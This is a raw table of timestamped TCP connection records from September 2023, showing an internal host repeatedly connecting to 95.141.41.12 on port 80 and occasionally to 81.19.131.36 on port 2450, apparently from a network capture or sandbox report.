Sep 28, 2023 06:02:30.371742010 CEST	80	49906	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.376130104 CEST	80	49906	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.376451969 CEST	49906	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.481761932 CEST	49906	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.482474089 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.677606106 CEST	80	49906	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.678308010 CEST	49906	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.679938078 CEST	80	49907	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.680399895 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.680399895 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.877583027 CEST	80	49907	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.879748106 CEST	80	49907	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.879966021 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.981513023 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.982278109 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.179490089 CEST	80	49908	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.179569960 CEST	80	49907	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.179780006 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.179891109 CEST	49907	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.184447050 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.381556034 CEST	80	49908	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.392395973 CEST	80	49908	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.392487049 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.496999025 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.497534990 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.694876909 CEST	80	49908	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.695203066 CEST	49908	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.697774887 CEST	80	49910	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.698225975 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.698225975 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:31.899023056 CEST	80	49910	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.915225983 CEST	80	49910	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:31.915419102 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.028476954 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.028840065 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.224623919 CEST	80	49911	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.224849939 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.227150917 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.229316950 CEST	80	49910	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.229499102 CEST	49910	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.422199965 CEST	80	49911	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.427289963 CEST	80	49911	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.427366018 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.528435946 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.528825998 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.723499060 CEST	80	49911	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.724143028 CEST	49911	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.727296114 CEST	80	49913	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.727719069 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.727819920 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:32.926100016 CEST	80	49913	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.931824923 CEST	80	49913	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:32.932315111 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.043989897 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.044466019 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.242655993 CEST	80	49913	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.242727995 CEST	49913	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.244204044 CEST	80	49914	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.244326115 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.244527102 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.445620060 CEST	80	49914	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.450167894 CEST	80	49914	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.450469971 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.559595108 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.559916019 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.751173019 CEST	80	49915	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.751385927 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.751569033 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.759409904 CEST	80	49914	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.759601116 CEST	49914	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:33.942796946 CEST	80	49915	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.947582006 CEST	80	49915	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:33.947693110 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.060100079 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.060496092 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.253186941 CEST	80	49915	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.253750086 CEST	49915	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.257925034 CEST	80	49917	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.258306026 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.258398056 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.457794905 CEST	80	49917	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.464062929 CEST	80	49917	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.464545965 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.576895952 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.577292919 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.766902924 CEST	80	49918	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.767479897 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.767822981 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.774069071 CEST	80	49917	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.774276972 CEST	49917	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:34.955027103 CEST	80	49918	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.960220098 CEST	80	49918	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:34.960378885 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.075342894 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.075674057 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.262882948 CEST	80	49918	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.263118029 CEST	49918	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.269294977 CEST	80	49919	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.269516945 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.269663095 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.463553905 CEST	80	49919	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.468000889 CEST	80	49919	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.468185902 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.575181961 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.575468063 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.769181013 CEST	80	49919	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.769547939 CEST	49919	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.772033930 CEST	80	49921	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.772346973 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.772552967 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:35.968971014 CEST	80	49921	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.973994970 CEST	80	49921	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:35.974205971 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.075185061 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.075719118 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.267755985 CEST	80	49922	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.267961025 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.268177032 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.271873951 CEST	80	49921	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.271950006 CEST	49921	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.459820032 CEST	80	49922	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.464445114 CEST	80	49922	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.464835882 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.575474977 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.576911926 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.767385006 CEST	80	49922	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.767651081 CEST	49922	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.770098925 CEST	80	49923	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.770344019 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.770698071 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:36.964133024 CEST	80	49923	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.968513966 CEST	80	49923	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:36.968956947 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.076040983 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.076508045 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.263736010 CEST	80	49925	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.264034986 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.264178991 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.269833088 CEST	80	49923	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.270028114 CEST	49923	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.451339006 CEST	80	49925	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.453087091 CEST	80	49925	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.453218937 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.559778929 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.560059071 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.748203039 CEST	80	49925	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.748414040 CEST	49925	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.751195908 CEST	80	49926	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.751396894 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.751478910 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:37.943224907 CEST	80	49926	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.947830915 CEST	80	49926	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:37.948075056 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.059689999 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.060168982 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.251574993 CEST	80	49926	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.251833916 CEST	49926	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.257541895 CEST	80	49928	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.257720947 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.258019924 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.455292940 CEST	80	49928	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.461225986 CEST	80	49928	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.461669922 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.575225115 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.575522900 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.769256115 CEST	80	49929	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.769658089 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.769887924 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.772334099 CEST	80	49928	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.772404909 CEST	49928	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:38.963778973 CEST	80	49929	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.965141058 CEST	80	49929	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:38.965250015 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.076551914 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.077054024 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.270360947 CEST	80	49929	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:39.270597935 CEST	49929	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.272275925 CEST	80	49930	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:39.272454977 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.285840034 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:39.481301069 CEST	80	49930	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.097860098 CEST	80	49930	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.098073006 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.431371927 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.431791067 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.627208948 CEST	80	49930	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.627509117 CEST	49930	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.633254051 CEST	80	49932	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.633347034 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.633599043 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.834939003 CEST	80	49932	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.835901022 CEST	80	49932	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:40.836112976 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.950176954 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:40.950608015 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.151804924 CEST	80	49932	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.151947975 CEST	49932	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.152139902 CEST	80	49934	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.152240992 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.152487040 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.353915930 CEST	80	49934	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.356829882 CEST	80	49934	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.356925011 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.465944052 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.466459036 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.663158894 CEST	80	49936	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.663275003 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.663495064 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.667597055 CEST	80	49934	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.667685032 CEST	49934	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.860285044 CEST	80	49936	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.864646912 CEST	80	49936	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:41.864809990 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.965831041 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:41.966367006 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.162719011 CEST	80	49939	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.162929058 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.162961960 CEST	80	49936	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.163079977 CEST	49936	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.163213968 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.359505892 CEST	80	49939	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.365104914 CEST	80	49939	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.365210056 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.481266022 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.481741905 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.678026915 CEST	80	49939	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.678283930 CEST	49939	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.686418056 CEST	80	49941	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.686738014 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.687364101 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:42.891612053 CEST	80	49941	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.896296024 CEST	80	49941	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:42.896545887 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.012789011 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.013103962 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.201112032 CEST	80	49942	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.201311111 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.201455116 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.217979908 CEST	80	49941	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.218198061 CEST	49941	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.388993025 CEST	80	49942	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.394805908 CEST	80	49942	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.395026922 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.505815029 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.506228924 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.694189072 CEST	80	49942	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.694425106 CEST	49942	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.702826977 CEST	80	49944	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.702950001 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.703142881 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:43.899590015 CEST	80	49944	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.904525995 CEST	80	49944	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:43.904764891 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.012598038 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.014956951 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.202073097 CEST	80	49945	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.202284098 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.202425957 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.209505081 CEST	80	49944	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.209707022 CEST	49944	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.389998913 CEST	80	49945	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.396702051 CEST	80	49945	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.396836996 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.512548923 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.512938976 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.700340033 CEST	80	49945	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.700489044 CEST	49945	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.704040051 CEST	80	49946	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.704185009 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.704581022 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:44.895705938 CEST	80	49946	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.905478954 CEST	80	49946	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:44.905576944 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.019273996 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.022728920 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.212229967 CEST	80	49946	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.212368011 CEST	49946	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.215109110 CEST	80	49948	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.215209007 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.218278885 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.409518003 CEST	80	49948	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.414534092 CEST	80	49948	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.414707899 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.528398037 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.528808117 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.719118118 CEST	80	49948	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.719216108 CEST	49948	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.725337982 CEST	80	49949	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.725447893 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.730411053 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:45.929351091 CEST	80	49949	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.933583021 CEST	80	49949	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:45.933701038 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.044416904 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.044739962 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.233232021 CEST	80	49953	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.233650923 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.233819962 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.241260052 CEST	80	49949	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.241380930 CEST	49949	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.345575094 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:02:46.348097086 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:02:46.422801018 CEST	80	49953	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.427618980 CEST	80	49953	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.427679062 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.543889046 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.544384003 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.559501886 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:02:46.731295109 CEST	80	49955	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.731590033 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.731786013 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.732306957 CEST	80	49953	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.732409000 CEST	49953	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:46.918818951 CEST	80	49955	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.924827099 CEST	80	49955	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:46.925064087 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.029174089 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.029565096 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.216581106 CEST	80	49955	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.216712952 CEST	49955	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.223130941 CEST	80	49958	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.223206997 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.223444939 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.416979074 CEST	80	49958	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.422827005 CEST	80	49958	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.422895908 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.528302908 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.528985023 CEST	49960	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.721673965 CEST	80	49958	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.721746922 CEST	49958	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.728477001 CEST	80	49960	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.728611946 CEST	49960	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:47.728843927 CEST	49960	80	192.168.2.3	95.141.41.12
